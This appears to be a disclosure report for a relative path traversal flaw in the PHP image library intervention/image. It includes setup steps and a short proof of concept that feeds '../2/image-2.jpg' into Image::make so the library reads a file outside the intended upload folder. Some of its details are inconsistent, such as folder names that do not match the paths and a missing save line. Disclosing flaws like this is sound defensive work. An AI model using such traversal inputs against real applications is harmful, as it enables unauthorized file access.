vulnerability relative path traversal
severity 6.1
language php
registry packagist


intervention/image is an image handling and manipulation library. This package is vulnerable to Directory Traversal attack.


  1. Create a project dir in your htdocs folder
  2. Install the package using composer. here
  3. Create the below folder structure where our images will be stored on your project root dir
-> first-folder
--> image-1.jpg
-> second-folder
--> image-2.jpg
  1. Create a test.php file on your project root dir then copy and paste this code below

require 'vendor/autoload.php';

$imageFilename = '../2/image-2.jpg';

// import the Intervention Image Manager Class
use Intervention\Image\ImageManagerStatic as Image;

// open an image file
$img = Image::make('uploads/1/'.$imageFilename);

// now you are able to resize the instance
$img->resize(320, 240);

// finally we save the image as a new file
  1. Open terminal in your project root dir, then run command php test.php
  2. Verify that the image is now on your uploads/1/newphoto.jpeg folder which is belongs to uploads/2/image-2.jpeg